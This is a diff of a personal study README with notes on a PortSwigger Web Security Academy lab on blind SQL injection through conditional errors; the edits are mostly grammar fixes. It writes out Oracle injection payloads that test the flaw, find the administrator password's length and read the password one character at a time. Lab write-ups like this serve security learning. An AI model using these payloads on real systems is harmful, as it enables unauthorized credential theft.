ribeiro-julio/hacking/portswigger-web-security-academy/sqli/README.md

 ### [Lab: Blind SQL injection with conditional errors](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors)

 Vulnerable URL: https://domain/filter?category=category
-- This URL does not provide any elements that interacts with the injected SQL, if we cause errors in the database, the page will render an error
+- This URL does not provide any elements that interact with the injected SQL, if we cause errors in the database, the page will render an error

 Test payload: `cookie' AND (SELECT CASE WHEN (1=1) THEN 'a' ELSE TO_CHAR(1/0) END FROM dual) = 'a'--` and `cookie' AND (SELECT CASE WHEN (1=2) THEN 'a' ELSE TO_CHAR(1/0) END FROM dual) = 'a'--`
-- When the first query is injected the page loads normally, but when the second query is injected and error page is loaded due a 500 error (server error, database error in that case).
+- When the first query is injected the page loads normally, but when the second query is injected an error page is loaded due to a 500 error (server error, database error in that case).
 The site has unhandled database errors, making it vulnerable to blind SQL injection

-To get the administrator password, the logic is the same as the previous lab.
-It can also be done through Burp Intruder or an script.
-The only thing that change are the queries (different technique and database)
+To get the administrator password, the logic is the same as in the previous lab.
+It can also be done through Burp Intruder or a script.
+The only thing that changed is the queries (different technique and database)
 - Query to get the password size: `' AND (SELECT CASE WHEN (LENGTH(password) > [size]) THEN 'a' ELSE TO_CHAR(1/0) END FROM users WHERE username = 'administrator') = 'a'--`
 - Query to enumerate the password: `' AND (SELECT CASE WHEN (SUBSTR(password, [position], 1) = '[character]') THEN 'a' ELSE TO_CHAR(1/0) END FROM users WHERE username = 'administrator') = 'a'--`